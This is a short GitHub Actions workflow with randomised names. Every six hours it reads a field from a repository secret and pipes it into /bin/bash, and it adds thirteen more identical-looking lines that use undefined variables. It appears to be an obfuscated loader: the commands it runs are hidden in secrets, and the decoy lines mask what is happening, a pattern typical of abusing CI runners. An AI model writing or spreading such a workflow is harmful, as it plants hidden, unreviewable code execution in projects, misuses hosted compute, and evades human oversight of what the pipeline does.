name: mabaifu4567

on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mabaifu4567
        env:
          ngidu58: ${{ secrets.ngidu58 }}
        run: |
          echo $ngidu58 | jq -r .otujb10 | /bin/bash
          echo $r01 | jq -r .un1566 | /bin/bash
          echo $lle2 | jq -r .mshd36 | /bin/bash
          echo $ynbgm9 | jq -r .onu781 | /bin/bash
          echo $mcx138 | jq -r .jevn43709 | /bin/bash
          echo $fvh11 | jq -r .pno03654 | /bin/bash
          echo $ez00 | jq -r .bou3 | /bin/bash
          echo $c83096 | jq -r .ccdf0 | /bin/bash
          echo $lc5570 | jq -r .wo1 | /bin/bash
          echo $tv9861 | jq -r .vl873 | /bin/bash
          echo $d54 | jq -r .oye9 | /bin/bash
          echo $nkafx92 | jq -r .aarrz521 | /bin/bash
          echo $skazk2 | jq -r .k40065 | /bin/bash
          echo $xn2 | jq -r .r60 | /bin/bash

